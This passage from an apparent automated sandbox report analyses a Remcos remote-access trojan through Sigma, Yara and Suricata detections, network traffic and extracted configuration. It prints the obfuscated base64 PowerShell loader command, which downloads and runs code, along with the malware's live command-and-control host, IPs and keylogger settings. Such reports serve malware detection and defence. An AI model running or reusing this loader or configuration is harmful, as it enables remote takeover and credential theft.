mV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkN
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp

                Data Obfuscation

                barindex
                Sigma detected: Drops script at startup location
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7952, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_77a2dde7.cmd

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7952, TargetFilename: C:\ProgramData\remcos\logs.dat

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-11T16:44:41.911036+010020365941Malware Command and Control Activity Detected192.168.2.104970337.120.208.4056379TCP
                2025-02-11T16:44:46.286090+010020365941Malware Command and Control Activity Detected192.168.2.104970437.120.208.4056379TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-11T16:44:45.971612+010028033043Unknown Traffic192.168.2.1049705178.237.33.5080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-11T16:44:37.554913+010018100002Potentially Bad Traffic192.168.2.1049702168.119.145.117443TCP
                2025-02-11T16:44:50.004883+010018100002Potentially Bad Traffic192.168.2.1049706168.119.145.117443TCP
                2025-02-11T16:45:03.836531+010018100002Potentially Bad Traffic192.168.2.1049710168.119.145.117443TCP
                2025-02-11T16:45:16.954675+010018100002Potentially Bad Traffic192.168.2.1049711168.119.145.117443TCP
                2025-02-11T16:45:30.357380+010018100002Potentially Bad Traffic192.168.2.1049712168.119.145.117443TCP
                2025-02-11T16:45:43.727659+010018100002Potentially Bad Traffic192.168.2.1049714168.119.145.117443TCP
                2025-02-11T16:45:57.818140+010018100002Potentially Bad Traffic192.168.2.1049715168.119.145.117443TCP
                2025-02-11T16:46:15.944529+010018100002Potentially Bad Traffic192.168.2.1049716168.119.145.117443TCP
                2025-02-11T16:46:29.934204+010018100002Potentially Bad Traffic192.168.2.1049717168.119.145.117443TCP
                2025-02-11T16:46:43.521337+010018100002Potentially Bad Traffic192.168.2.1049718168.119.145.117443TCP
                2025-02-11T16:46:58.014495+010018100002Potentially Bad Traffic192.168.2.1049719168.119.145.117443TCP
                2025-02-11T16:47:28.667866+010018100002Potentially Bad Traffic192.168.2.1049720168.119.145.117443TCP
                2025-02-11T16:47:43.640698+010018100002Potentially Bad Traffic192.168.2.1049721168.119.145.117443TCP
                2025-02-11T16:48:07.028166+010018100002Potentially Bad Traffic192.168.2.1049722168.119.145.117443TCP
                2025-02-11T16:48:25.947324+010018100002Potentially Bad Traffic192.168.2.1049723168.119.145.117443TCP
                2025-02-11T16:48:43.172845+010018100002Potentially Bad Traffic192.168.2.1049724168.119.145.117443TCP
                2025-02-11T16:48:54.789345+010018100002Potentially Bad Traffic192.168.2.1049725168.119.145.117443TCP
                2025-02-11T16:49:08.069898+010018100002Potentially Bad Traffic192.168.2.1049726168.119.145.117443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 11.2.powershell.exe.9111288.3.raw.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": ["abokirem.duckdns.org:56379:1"], "Assigned name": "Aboki", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-J4I3IV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                Yara detected Remcos RAT
                Source: Yara matchFile source: 11.2.powershell.exe.9111288.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.9111288.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000002B.00000002.2404458461.0000000008C77000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1738368992.0000000008969000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1682233166.00000000031AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000030.00000002.2770159710.0000000009257000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000045.00000002.4126886116.0000000007749000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.1891644249.0000000008290000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000045.00000002.4130426357.0000000007752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000002.3497316854.0000000009367000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000030.00000002.2678699893.0000000007840000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.1896532258.0000000008827000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000002.3442365078.0000000008DB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1577103646.00000000091E8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000036.00000002.3152004242.00000000094A7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.2080996023.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000040.00000002.3745750171.0000000008737000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004F.00000002.3526539449.0000000002D7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.2065499351.0000000009407000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000030.00000002.2731153050.0000000008CCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.2225364286.0000000009057000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000040.00000002.3689742883.0000000008197000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000002.3330103811.0000000007990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1741165047.0000000008F17000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1576231217.0000000009110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2232, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3472, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2800, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8144, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7612, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6188, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2032, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                Source: powershell.exe, 0000000B.00000002.1577103646.00000000091E8000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_741a4ecf-6

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 11.2.powershell.exe.9111288.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.9111288.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.1577103646.00000000091E8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1576231217.0000000009110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2232, type: MEMORYSTR
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49726 version: TLS 1.2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407EF8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407898
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:49704 -> 37.120.208.40:56379
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:49703 -> 37.120.208.40:56379
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: abokirem.duckdns.org
                Connects to many ports of the same IP (likely port scanning)
                Source: global trafficTCP traffic: 37.120.208.40 ports 56379,3,5,6,7,9
                Uses dynamic DNS services
                Source: unknownDNS query: name: abokirem.duckdns.org
                Source: global trafficTCP traffic: 192.168.2.10:49703 -> 37.120.208.40:56379
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 37.120.208.40 37.120.208.40
                Source: Joe Sandbox ViewIP Address: 168.119.145.117 168.119.145.117
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:49705 -> 178.237.33.50:80
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49712 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49706 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49720 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49723 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49721 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49724 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49715 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49710 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49726 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49719 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49718 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49714 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49725 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49717 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49702 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49711 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49716 -> 168.119.145.117:443
